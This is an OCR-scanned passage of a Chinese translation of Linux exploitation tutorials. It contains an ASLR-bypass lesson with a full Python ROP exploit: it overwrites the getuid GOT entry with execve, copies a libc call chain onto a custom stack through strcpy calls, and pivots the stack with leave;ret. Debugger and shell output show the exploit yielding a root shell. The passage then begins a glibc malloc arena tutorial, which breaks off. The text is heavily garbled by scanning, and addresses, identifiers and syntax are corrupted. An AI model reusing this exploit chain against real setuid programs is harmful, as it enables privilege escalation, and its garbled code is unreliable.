buf += conv(g6) #pop esi; pop edi; pop ebp; ret; 
buf += conv(esi) #esi 
buf += conv(edi) #edi 
buf += conv(dummy) 
buf += conv(g5) #pop ebx; ret; 
buf += conv(ebx) #ebx 
buf += conv(g4) #mov Ox34(%esp),%eax; 


for num in range(0,11): 
buf += conv(dummy ) 


buf += conv(g2) #pop ebx; pop ebp; ret; 

ebx = 0xaaa99b40 #getuid@GOT -0x5d5b04c4 

buf += conv(ebx) 

buf += conv(off) 

buf += conv(g1) #addl %eax, Ox5D5B04C4(%ebx); ret; 
buf += "B" * 4 


print "Calling vulnerable program" 
call(["./vuln", buf]) 


执行 上 面 的 利用 代码 会 生成 核心 文件 。 打 开 核 心 文件 来 查 
看 cor[getuid] 被 execve 函数 地 址 履 盖 (在 下 面 展示 ) 
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$ python oexp.py 

Calling vulnerable program 

B 

Len:376 
sploitfunQsploitfun-VirtualBox:-/lsploits/new/aslr/part3$ sudo g 
db -q vuln 

Reading symbols from /home/sploitfun/lsploits/new/aslr/part3/vul 
n...(no debugging symbols found)...done. 

(gdb) core-file core 

[New LWP 18781] 

warning: Can't read pathname for load map: Input/output error. 
Core was generated by ~./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' . 

Program terminated with signal 11, Segmentation fault. 

#0 0x42424242 in ?? () 

(gdb) x/ixw 0x804a004 

0x804a004 <getuid@got.plt>: Oxb761a1f0 

(gdb) p getuid 

$1 = {} Oxb761accO 

(gdb) p execve 

$2 = {} Oxb761a1f0 


(gdb) 


好 的 ， 我 们 已 经 成 功 将 getuid 9 GOT &H E execve 的 地 址 。 因 为 现在 为 
JE > £4 getuid 的 调用 都 会 调用 execve > 


派生 root shell 


我 们 的 利用 还 没完 ， 我 们 刚刚 执行 了 GOT Žž? FEAH root shell» A TR 
+ root shell， 将 下 面 的 Libc BH (以 及 它们 的 参数 ) 复制 到 栈 上 。 


seteuid@PLT | getuidQPLT | seteuid arg | execve argi | execve ar 
g2 | execve arg3 


Ar: 


e setuid@PLT : setuid 的 PLT 代码 地 址 ( 0x80483c0 ) ° 

e getuid@PLT : getuid 的 PLT 代码 地 址 ( 0x80483b0 ) ， 但 是 这 回调 
用 execve ， 因 为 我 们 已 经 执行 了 GOT A & ° 

e seteuid arg 应 该 为 0 来 获得 root shell。 

e execve argi -- 文 件 名 称 -- 字符 串 /bin/sh 的 地 址 。 

e execve arg2 -- argv -- 参 数 数组 的 地 址 ， 它 的 内 容 


是 [Address of "/bin/sh", NULL] 。 
e execve arg3 -= envp -- NULL ° 


我 们 在 第 五 篇 中 看 到 ， 因 为 我 们 不 能 直接 使 用 0 来 溢出 缓冲 区 《因为 0 是 坏 字 
符 ) ， 我 们 可 以 使 用 strcpy 链 来 复制 0 代替 seteuid_arg 。 但 是 这 个 解法 不 能 
在 这 里 使 用 ， 因 为 栈 是 随机 化 的 ， 知 道 seteuid arg 的 栈 上 位 置 的 准确 地 址 十 分 


困难 。 
如 何 绕 过 栈 地 址 随机 化 ? 

可 以 使 用 自 定 义 栈 和 stack pivot 技巧 来 绕 过 它 。 
什么 是 自 定义 栈 ? 


自 定义 栈 是 由 攻击 者 控制 的 栈 区 域 。 它 复制 Libe 函数 链 ， 以 及 函数 参数 来 绕 过 栈 随 
机 化 。 EE 置 独立 和 可 写 的 进程 的 内 存 区 域 作为 自 定 义 栈 ， 
TE 党 过 。 在 我 们 的 二 进 制 vuln 中 ， 可 写 和 非 位 置 独 立 的 内 存 区 域 ， 

是 0x804a000 和 Ox804b000 (在 下 面 展示 ) 


$ cat /proc//maps 

08048000-08049000 r-xp 00000000 08:01 399848 /home/sploitfun/lsp 
loits/aslr/vuln 

08049000-0804a000 r--p 00000000 08:01 399848 /home/sploitfun/lsp 
loits/aslr/vuln 

0804a000-0804b000 rw-p 00001000 08:01 399848 /home/sploitfun/lsp 
loits/aslr/vuln 

b7e21000-b7e22000 rw-p 00000000 00:00 0 

b7e22000-b7fc5000 r-xp 00000000 08:01 1711755 /lib/i386-linux-gn 
u/libc-2.15.so 

b7fc5000-b7fc7000 r--p 001a3000 08:01 1711755 /lib/i386-linux-gn 
u/libc-2.15.so 

b7fc7000-b7fc8000 rw-p 001a5000 08:01 1711755 /lib/i386-linux-gn 
u/libc-2.15.so 

b7fc8000-b7fcb000 rw-p 00000000 00:00 © 

bzfdb000-b7fddOO0 rw-p 00000000 00:00 © 

b7fdd000-b7fde000 r-xp 00000000 00:00 © [vdso] 

b7fde000-b7ffeO000 r-xp 00000000 08:01 1711743 /lib/i386-linux-gn 
u/ld-2.15.so 

bzffeo00-b7fffO000 r--p 0001f000 08:01 1711743 /lib/i386-linux-gn 
u/ld-2.15.so 

bzfffO000-b8000000 rw-p 00020000 08:01 1711743 /lib/i386-linux-gn 
u/ld-2.15.so 

bffdfO000-c0000000 rw-p 00000000 00:00 © [stack] 

$ 


lk: BA data 和 bes 段 的 内 存 区 域 可 以 用 作 自 定义 栈 位 置 。 我 选择 
了 0x804a360 作为 自 定 义 栈 位 置 。 


现在 选择 自 定 义 栈 位 置 之 后 ， 需要 将 Libe 函数 链 以 及 它们 的 函数 复制 到 自 定 义 
栈 中 。 我 们 这 里 ， 将 下 面 的 Libc BK (以 及 它们 的 参数 ) 复制 到 自 定 义 栈 位 置 ， 以 
便 派 生 root shell ° 


seteuid@PLT | getuidQPLT | seteuid arg | execve argi | execve ar 
g2 | execve arg3 


为 了 将 这 些 内 容 复 制 到 栈 上 ， 我 们 需要 将 实际 栈 的 返回 地 址 ， 履 盖 为 一 系 
^| stropy 调用 。 例 如 ， 为 了 将 seteuid@PLT (0x80483c0) 复制 到 自 定 义 栈 
上 ， 我 们 需要 : 


e 四 个 strcpy 调用 -- 每 个 十 六 进 制 值 ( 0x08, 0x04, 0x83, OxcO ) 使 用 一 
个 strcpy 调用 。 

e strcpy 的 来 源 参数 应 该 是 可 执行 内 存 区 域 的 地 址 ， 它 包含 所 需 的 十 六 进 制 
值 ， 并 且 我 们 也 需要 确保 这 个 值 不 被 改动 ， 它 在 所 选 的 内 存 区 域 存在 。 

e strcpy 的 目标 参数 应 该 是 自 定义 栈 位 置 的 目标 地 址 。 


遵循 上 面 的 过 程 ， 我 们 就 建立 了 完整 的 自 定 义 栈 。 一 旦 自 定义 栈 建 立 完成 ， 我 们 需 
要 将 自 定义 栈 移 动 到 真实 的 栈 上 ， 使 用 stack pivot 技巧 。 


什么 是 stack pivot ? 


stack pivot 使 用 leave ret 指令 来 实现 。 我 们 已 经 知道 了 ， leave 指令 会 翻译 
A: 


mov ebp, esp 
pop ebp 


所 以 在 leave 指令 之 前 ， 使 用 自 定义 栈 地 址 来 加 载 EBP -- 4 leave 指令 执行 
时 ， 会 使 ESP 指向 EBP。 所 以 ， 在 转移 到 自 定义 栈 之 后 ， 我 们 会 继续 执行 一 Libe 
函数 序列 ， 它 们 加 载 到 了 自 定义 栈 上 ， 然 后 就 获得 了 root shell 。 


完整 的 利用 代码 


#exp . py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


#GOT overwrite using ROP gadgets 

G1: 0x0804849e: addl %eax, Ox5D5B04C4(%ebx) ; ret ; 
G2: 0x080484a2: popl %ebx ; pop ebp; ret ; 

G3: 0x????????: popl %eax ; ret ; (NOT found) 

G4: 0x080485b3: mov Ox34(%esp),%eax... 

G5: 0x08048380: pop ebx ; ret ; 

G6: 0x080485cd: pop esi ; pop edi ; pop ebp ; ret ; 
G7: 0x08048498: movb $0x1,0x804a028... 


绕 过 ASLR -- 第 三 部 分 


0x0804849e 
0x080484a2 
0x080485b3 
0x08048380 
0x080485cd 
0x08048498 
dummy = Oxdeadbe 
0x01020101 
0x01020102 
Ox3fc9c18 
Oxttifftb3so 


ZCustom Stack 


ef 


#ebx = 0x8049f3c - (esi*4) + OxeO 


#0x804a360 - Dummy EBP|seteuidQPLT|getuidQPLT|seteuid arg|execve 


.argi|execve arg2|execve arg3 


cust esp - 0x804a360 
cust base esp - 0x804a360 
4seteuidQPLT 0x80483c0 


seteuid_octi = 0x8048143 
seteuid oct2 - 0x8048130 
seteuid oct3 = 0x8048355 
seteuid oct4 = 0x80481cb 


#getuid@PLT 0x80483b0 


getuid oct1 = 0x8048143 
getuid oct2 - 0x8048130 
getuid oct3 = 0x8048355 
getuid oct4 - 0x80483dc 


4seteuid arg 0x00000000 
seteuid null arg = 0x804a360 
Zexecve arg1 0x804ac60 


execve_argi_octi 
execve arg1 oct2 
execve arg1 oct3 
execve argi oct4 


0x8048143 
0x8048130 
0x8048f44 
0x804819a 


Zexecve arg2 0x804ac68 


execve_arg2_octi 
execve_arg2_oct2 
execve_arg2_oct3 
execve_arg2_oct4 


0x8048143 
0x8048130 
0x8048f44 
0x80483a6 


Zexecve arg3 0x00000000 


execve null arg 
execve path dst 
ins execve path 
execve path oct1 
execve path oct2 
execve path oct3 
execve path oct4 
execve path oct5 
execve path oct6 
execve argv dst 


HE? 


0x804a360 
0x804ac60 
bin/sh" 
0x8048154 
0x8048157 
0x8048156 
0x804815e 
0x8048162 
0x80483a6 
0x804ac68 


ZCustom stack base address 
ZCustom stack base address 


#08 
#04 
#83 
#c0 


#08 
#04 
#83 
#b0 


#08 
#04 
ZAC 
#60 


#08 
#04 
ZAC 
#68 


#Custom stack location which conta 


#/ 
#b 
HT 
zn 
#S 
#h 
#Custom stack location which conta 


ins execve argv [0x804ac60, 0x0] 
execve_argvi_oct1 = 0x8048143 #08 
= 0x8048130 #04 


execve argvi oct 


2 


execve argvi oct3 = 0x8048f44 DAC 
execve argv1 oct4 = 0x804819a #60 


strcpy plt = 0x80483d0 #strcpy@PLT 

ppr_addr = 0x080485ce #popl %edi ; popl %ebp ; ret ; 
#Stack Pivot 

pr addr = 0x080484a3 #popl %ebp ; ret ; 

lr addr - 0x08048569 #leave ; ret ; 


#endianess convertion 
def conv(num): 
return struct.pack("«I",num* 268 #Junk 
buf += conv(g7) #movb $0x1,0x804a028; add esp, 0x0 
4; pop ebx; pop ebp; ret; 
buf += conv(dummy ) 
buf += conv(dummy ) 
buf += conv(dummy ) 


buf += conv(g6) #pop esi; pop edi; pop ebp; ret; 
buf += conv(esi) #esi 

buf += conv(edi) #edi 

buf += conv(dummy) 

buf += conv(g5) #pop ebx; ret; 

buf += conv(ebx) #ebx 

buf += conv(g4) 4mov Ox34(%esp),%eax; 


for num in range(0, 11): 
buf += conv(dummy) 


buf += conv(g2) #pop ebx; pop ebp; ret; 

ebx - 0xaaa99b40 #getuid@GOT -0x5d5b04c4 

buf += conv(ebx) 

buf += conv(off) 

buf += conv(g1) #addl %eax, Ox5D5B04C4(%ebx); ret; 
#Custom Stack 

#Below stack frames are for strcpy (to copy seteuid@PLT to custo 
m stack) 

cust esp += 4 #Increment by 4 to get past Dummy 
EBP. 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(seteuid_oct4) 

cust esp += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(seteuid_oct3) 

cust_esp += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(seteuid_oct2) 

cust_esp += 1 


buf += conv(strcpy plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(seteuid_oct1) 

#Below stack frames are for strcpy (to copy getuid@PLT to custom 
stack) 

cust_esp += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(getuid_oct4) 

cust_esp += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(getuid_oct3) 

cust esp += 1 

buf += conv(strcpy plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(getuid_oct2) 

cust esp += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(getuid oct1) 

#Below stack frames are for strcpy (to copy seteuid arg to cust 

om stack) 

cust esp += 1 

buf += conv(strcpy plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(seteuid_null_arg) 

cust esp += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(seteuid_null_arg) 

cust esp += 1 

buf += conv(strcpy plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(seteuid_null_arg) 

cust_esp += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(cust_esp) 

buf += conv(seteuid_null_arg) 

#Below stack frames are for strcpy (to copy execve_argl to cust 

om stack) 

cust esp += 1 

buf += conv(strcpy plt) 

buf += conv(ppr. addr) 


buf += conv(cust esp) 


buf += conv(execve arg1 oct4) 


cust esp += 1 

buf += conv(strcpy plt) 
buf += conv(ppr. addr) 
buf += conv(cust esp) 


buf += conv(execve arg1 oct3) 


cust esp += 1 

buf += conv(strcpy plt) 
buf += conv(ppr. addr) 
buf += conv(cust esp) 


buf += conv(execve arg1 oct2) 


cust esp += 1 

buf += conv(strcpy plt) 
buf += conv(ppr. addr) 
buf += conv(cust esp) 
*- CO 

ow stack frames are 


Lau are 











om stack) 

cust_esp += 1 

buf += conv(strcpy_plt) 
buf += conv(ppr_addr ) 


buf += conv(cust_esp) 


buf += conv(execve_arg2_oct4) 


cust esp += 1 

buf += conv(strcpy plt) 
buf += conv(ppr. addr) 
buf += conv(cust esp) 


buf += conv(execve arg2 oct3) 


cust esp += 1 

buf += conv(strcpy plt) 
buf += conv(ppr_addr ) 
buf += conv(cust_esp) 


buf += conv(execve_arg2_oct2) 


cust esp += 1 

buf += conv(strcpy plt) 
buf += conv(ppr. addr) 
buf += conv(cust esp) 


buf += conv(execve arg2 oct1) 
> for 


HDA Atal c an Framac arc 
#Below stack frames are 





om s 
cust esp += 1 

buf += conv(strcpy plt) 
buf += conv(ppr_addr ) 
buf += conv(cust_esp) 


-arLl A 
ACK) 


buf += conv(execve_null_arg) 


cust_esp += 1 

buf += conv(strcpy plt) 
buf += conv(ppr_addr) 
buf += conv(cust_esp) 


buf += conv(execve_null_arg) 


cust_esp += 1 
buf += conv(strcpy_plt) 


n 
Ui 


nv(execve arg1 oct1) 
f 


Y 


SEN 


to cust 





buf += conv(ppr addr) 

buf += conv(cust esp) 

buf += conv(execve null arg) 
cust esp *- 1 

buf += conv(strcpy plt) 

buf += conv(ppr addr) 

buf += conv(cust esp) 

buf += conv(execve null arg) 
#Below stack frame is for strcpy (to copy execve path 





to custom stack Q loc 0x804ac6€ 
buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_path_dst) 
buf += conv(execve path oct1) 
execve path dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_path_dst) 
buf += conv(execve path oct2) 
execve path dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_path_dst) 
buf += conv(execve_path_oct3) 
execve_path_dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_path_dst) 
buf += conv(execve_path_oct4) 
execve_path_dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_path_dst) 
buf += conv(execve path oct1) 
execve path dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_path_dst) 
buf += conv(execve_path_oct5) 
execve_path_dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_path_dst) 
buf += conv(execve path oct6) 
#Be F e is for strcpy 
c60) to custom stack Q loc Ox 
buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_argv_dst) 
buf += conv(execve argv1 oct4) 
execve argv dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 





)w stack fran 









buf += conv(execve argv dst) 

buf += conv(execve argv1 oct3) 

execve argv dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_argv_dst) 

buf += conv(execve argv1 oct2) 

execve argv dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_argv_dst) 

buf += conv(execve_argvi_oct1) 

#Below stack frame is for strcpy (to copy execve argv[i] (0x0) t 
o custom stack Q loc 0x804ac6c) 

execve argv dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_argv_dst) 

buf += conv(execve_null_arg) 

execve_argv_dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_argv_dst) 

buf += conv(execve_null_arg) 

execve_argv_dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_argv_dst) 

buf += conv(execve_null_arg) 

execve argv dst += 1 

buf += conv(strcpy_plt) 

buf += conv(ppr_addr ) 

buf += conv(execve_argv_dst) 

buf += conv(execve_null_arg) 

#Stack Pivot 

buf += conv(pr_addr) 
buf += conv(cust_base_esp) 
buf += conv(lr addr) 


print "Calling vulnerable program" 
call(["./vuln", buf]) 


执行 上 述 利 用 代码 ， 我 们 会 获得 root shell (在 下 面 展示 ) 


$ python exp.py 
Calling vulnerable program 


222k20222177 222027 2?0n9 222027 222217 

Len:1008 

# id 

uid=1000(sploitfun) gid-1000(sploitfun) euid=0(root) egid=0(root 
) groups=0(root),4(adm), 24(cdrom),27(sudo), 30(dip), 46(plugdev),1 
09(lpadmin),124(sambashare),1000(sploitfun) 

# exit 

$ 


PAYLOAD ALREADY INSIDE: DATA REUSE FOR ROP EXPLOITS 


理解 glibc malloc 


理解 glibc malloc 


译 者 : 猫 科 龙 @csdn 
来 源 ` http://blog.csdn.net/maokelong95/article/details/51989081 
本 篇 文章 主要 完成 了 对 [Understanding glibc malloc) 的 翻译 工作 。 限 于 本 人 
翻译 水 平 与 专业 技术 水 平 (纯粹 为 了 了 解 内 存 分 配 而 翻 ) ， 本 文章 必定 会 有 很 
多 不 足 之 处 ， 请 大 家 见谅 ， 也 欢迎 大 家 的 指正 | 
联系 邮箱 ` 974985526@qq.com 。 
2017/03/17 
优化 排版 
堆 内 存 是 一 个 很 有 意思 的 领域 ， 这样 的 问题 : 
扒 内存 是 如 何 从 内 核 中 分 配 的 ? 内 存 管理 效率 怎样 ? Coe AK > BR? 
还 是 应 用 本 身 管 理 的 ? 堆 内存 可 以 开发 吗 ? 


我 也 困惑 了 很 久 ， 但 是 直到 最 近 我 才 有 时 间 去 了 解 它 。 下 面 就 让 我 来 谈 谈 我 的 研究 
成 果 。 开 源 社区 提供 了 很 多 现成 的 内 存 分 配器 (memory allocators ) : 





dimalloc — General purpose allocator 
ptmalloc2 — glibc 

jemalloc — FreeBSD and Firefox 
tcmalloc — Google 

libumem - Solaris 


每 一 种 分 配器 都 宣称 自己 快 (fast)、 可 拓展 (scalable ) ^ z& 4 à (memory efficient) ! 
但 是 并 非 所 有 的 分 配器 都 适用 于 我 们 的 应 用 。 内 存 知 吐 量 大 (memory hungry) 的 应 
用 程序 的 性 能 很 大 程度 上 取决 于 内 存 分 配器 的 性 能 。 


在 这 篇 文章 中 ， 我 将 只 谈论 [glibc malloc! 内 存 分 配器 。 为 了 更 好 地 理解 [glibc 
malloc) ， 我 会 联系 最 近 的 源 代 码 。 


历史 : ptmalloc2 基于 dlmalloc 开发 ， 并 添加 了 对 多 线程 的 支持 ， 于 2006 年 
公布 。 在 公布 之 后 ，ptmalloc2 被 整合 到 glibc 源 代码 中 ， 此 后 ptmalloc2 所 有 
的 修改 都 直接 提交 到 glibc 的 malloc 部 分 去 了 。 因 此 ，ptmalloc2 的 源码 和 
glibc 的 malloc 源 码 有 很 多 不 一 致 的 地 方 。( 译 者 注 : 1996 年 出 现 的 dlmalloc 
只 有 一 个 主 分配 区 ， 为 所 有 线程 所 争 用 ，1997 年 发 布 的 ptmalloc 在 dimalloc 
的 基础 上 引入 了 非 主 分 配 区 的 支持 。 ) 


e 理解 glibc malloc 
o 系统 调用 
o 线程 处 理 
o Example 


理解 glibc malloc 


m 输出 分 析 

在 主线 程 malloc 之 前 
在 主线 程 malloc 之 后 
在 主线 程 free 之 后 

在 thread1 malloc 之 前 
在 thread1 malloc 之 后 
在 thread1 free 之 后 


o Arena 
= Arena 的 数量 
= Multiple Arena 
m Multiple Heaps 
o Chunk 
m Allocated chunk 
m Free chunk 
o Bins 
m Fast Bin 
m Unsorted Bin 
mall Bin 
Large Bin 
Top Chunk 
Last Remainder Chunk 


系统 调用 


在 之 前 的 文章 中 提 到 过 malloc 的 内 部 调用 为 brk 或 mmap 。 
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理解 glibc malloc 


译 者 注 : 其 中 有 一 张 关于 虚拟 地 址 空间 分 布 的 图 片 ， 我 觉得 很 有 助 于 本 篇 文章 
的 理解 ， 因 此 把 它 放 在 此 处 。 












Bxc6666666 == TASK SIZE 
Random stack offset 


RLIMIT_STACK (e.g., 8MB) 


f Random mmap offset 


program break 
brk 


start_brk 
Random brk offset 


end_data 


start_data 
end_code 


¥ 
nzo 


线程 处 理 


Linux 的 早期 版 本 使 用 dlmalloc 为 默认 内 存 分 配器 ， 但 是 因为 ptmalloc2 提供 了 多 
线程 支持 ， 所 以 Linux 后 来 采用 ptmalloc2 作为 默认 内 存 分 配器 。 多 线程 支持 可 以 
提升 内 存 分 配器 的 性 能 ， 进 而 间接 提升 应 用 的 性 能 。 


在 dimalloc 中 ， 当 有 两 个 线程 同时 调用 malloc 时 ， 只 有 一 个 线程 能 够 访问 临界 区 
(critical section) 为 [空间 列表 数据 结构 」(freelist data structure) 被 所 有 可 用 
线程 共享 。 正 如 此 ， 使 用 dlmalloc 的 多 线程 应 用 会 在 内 存 分 配 上 耗费 过 多 时 间 ， 导 
致 整个 应 用 性 能 的 下 降 。 


而 在 ptmalloc2 中 ， 当 有 两 个 线程 同时 调用 malloc 时 ， 内 存 均 会 得 到 立即 分 配 一 一 
因为 每 个 线程 都 维护 着 一 个 独立 的 「 堆 段 ] (heap segment)， 因 此 维护 这 些 堆 的 
[空闲 列表 数据 结构 」 也 是 独立 的 。 这 种 为 每 个 线程 独立 地 维护 堆 和 空闲 列 表 数 
据 结 构 」 的 行为 就 称 为 per thread arena 。 





Example: 
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/* Per thread arena example. */ 
#include <stdio.h> 

#include <stdlib.h> 

#include <pthread.h> 

#include <unistd.h> 

#include <sys/types.h> 


void* threadFunc(void* arg) { 
printf("Before malloc in thread 1\n"); 
getchar(); 
char* addr = (char*) malloc(1000); 
printf("After malloc and before free in thread 1n"); 
getchar(); 
free(addr); 
printf("After free in thread 1\n"); 
getchar(); 


} 


int main() { 
pthread_t t1; 
void* s; 
int ret; 
char* addr; 


printf("Welcome to per thread arena example::%d\n",getpi 


d()); 

printf("Before malloc in main thread\n"); 

getchar(); 

addr = (char*) malloc(1000); 

printf("After malloc and before free in main thread\n"); 

getchar(); 

free(addr); 

printf("After free in main thread\n"); 

getchar(); 

ret = pthread_create(&t1, NULL, threadFunc, NULL); 

if(ret) 

{ 
printf("Thread creation error\n"); 
return -1; 

ret = pthread_join(t1, &s); 

if(ret) 

{ 
printf("Thread join error\n"); 
return -1; 

} 

return 0; 

} 


输出 分 析 


在 主线 程 malloc 之 前 
在 如 下 的 输出 里 我 们 可 以 看 到 ， 这 里 还 没有 『「 堆 段 ] 也 没有 『「 每 线程 栈 」(per- 
thread stack)， 因 为 thread! 还 没有 创建 ! 


sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ ./mthread 


Welcome to per thread arena example::6501 
Before malloc in main thread 


sploitfun@sploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ cat /proc 


/6501/maps 
08048000-08049000 r-xp 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

08049000-0804a000 r--p 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

0804a000-0804b000 rw-p 00001000 08:01 539625 /home/sploitfun 


/ptmalloc.ppt/mthread/mthread 
b7e05000-b7e07000 rw-p 00000000 00:00 0 


sploitfun@sploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ 


在 主线 程 malloc 之 后 


在 如 下 的 输出 中 我 们 可 以 看 到 堆 段 产生 在 数据 段 (0804b000 - 0806c000) 之 上 ， 这 表 
明 堆 内 存 是 通过 更 高 级 别 的 中 断 产 生 (也 即 brk PBT) 。 此 外 ， 请 注意 ， 尽 管用 户 
只 申请 了 1000 字 节 的 内 存 ， 但 是 实际 产生 了 132KB 的 堆 内存 。 这 个 连续 的 堆 内 存 
区 域 被 称 为 SUMAS 。 因 为 这 个 Tarena] 是 被 主线 程 建立 的 ， 因 此 称 为 [main 
arena! 。 接 下 来 的 申请 会 继 给 CH [arena] 的 132KB 中 剩余 的 部 分 ， 直 到 用 
尽 。 当 用 尽 时 ， 它 可 以 通过 更 高 级 别 的 中 断 扩 容 ， 在 扩容 之 后 ， [top chunkj 的 大 
小 也 随 之 调整 以 圈 进 这 块 额 25 。 相 应 地 ， Tarena] 也 可 以 在 [top chunk] 
空间 过 大 时 缩小 。 

un chunk — N arena? 最 顶层 的 chunk。 有 关 top chunk 的 更 多 信息 详 


注意 
NT “top chunk" 部 分 


sploitfunQsploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ ./mthread 


Welcome to per thread arena example::6501 
Before malloc in main thread 
After malloc and before free in main thread 


sploitfunQsploitfun-VirtualBox:-/lsploits/hof/ptmalloc.ppt/mthre 
ad$ cat /proc/6501/maps 


08048000-08049000 r-xp 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

08049000-0804a000 r--p 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

0804a000-0804b000 rw-p 00001000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

0804b000-0806c000 rw-p 00000000 00:00 0 [heap] 


b7e05000-b7e07000 rw-p 00000000 00:00 0 


sploitfunQsploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ 


在 主线 程 free 之 后 


在 如 下 的 输出 结果 中 我 们 可 以 看 出 当 分 配 的 内 存 区 域 free 掉 时 ， 其 后 的 内 存 并 不 会 
立即 释放 给 操作 系统 。 分 配 的 内 存 区 域 (1000B) 仅仅 是 移交 给 了 [glibc 

malloc] ， 把 这 段 free 掉 的 区 域 添加 在 了 | main arenas bin」 中 (在 [glibc 
malloc! 中 ， 空 闲 列 表 数 据 结 构 被 称 为 Thin] ) 。 随 后 当 用 户 请 求 内 存 时 ， [glibc 
malloc! 就 不 再 从 内 核 中 申请 新 的 堆 区 了 ， 而 是 尝试 在 [bin] FRE ÈA EI > 
非 实 在 找 不 到 。 


sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ ./mthread 


Welcome to per thread arena example::6501 
Before malloc in main thread 

After malloc and before free in main thread 
After free in main thread 


sploitfunQsploitfun-VirtualBox:-/lsploits/hof/ptmalloc.ppt/mthre 
ad$ cat /proc/6501/maps 


08048000-08049000 r-xp 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

08049000-0804a000 r--p 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

0804a000-0804b000 rw-p 00001000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

0804b000-0806c000 rw-p 00000000 00:00 0 [heap] 


b7e05000-b7e07000 rw-p 00000000 00:00 0 


sploitfunQsploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ 


在 thread1 malloc 之 前 


在 如 下 的 输出 中 我 们 可 以 看 见 此 时 并 没有 thread1 的 堆 段 ， 但 是 其 每 个 线程 栈 都 已 


sploitfunQsploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ ./mthread 


Welcome to per thread arena example::6501 
Before malloc in main thread 

After malloc and before free in main thread 
After free in main thread 

Before malloc in thread 1 


sploitfun@sploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ cat /proc 
/6501/maps 


08048000-08049000 r-xp 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

08049000-0804a000 r--p 00000000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

0804a000-0804b000 rw-p 00001000 08:01 539625 /home/sploitfun 
/ptmalloc.ppt/mthread/mthread 

0804b000-0806c000 rw-p 00000000 00:00 0 [heap] 
b7604000-b7605000 ---p 00000000 00:00 0 

b7605000-b7e07000 rw-p 00000000 00:00 0 [stack:6594] 


sploitfunQsploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ 


在 thread1 malloc 之 后 


在 如 下 的 输出 结果 中 我 们 可 以 看 出 thread1 的 堆 段 建立 在 内 存 映 射 段 区 域 
(b7500000 - b7521000，132KB)， 这 也 表明 THEA AAA mmap 系统 调用 产生 
的 ， 而 非 同 主线 程 一 样 使 用 sbrk 系统 调用 。 同 样 地 ， 尽 管用 户 只 请 求 了 1000B > 
1MB 的 堆 内存 还 是 被 映射 到 了 进 程 地址 空 间 。 在 这 1MB， 只 有 132KB 被 设置 了 读 
写 权 限 并 成 为 该 线程 的 堆 内 存 。 这 段 连续 内 存 (132KB) eA T thread 

arena] ° 


注意 : 当 用 户 请 求 超过 128KB 大 小 并 且 此 时 larena] 中 没有 足够 的 空 | 
满足 用 户 的 请 求 时 ， 内 存 将 通过 使 用 mmap 系统 调用 (不 再 是 sbrk) 来 分 配 
不 论 请 求 是 发 自 [main arenal) 还 是 [thread arena ° 


ploitfun@sploitfun-VirtualBox:-/ptmalloc.ppt/mthread$ ./mthread 
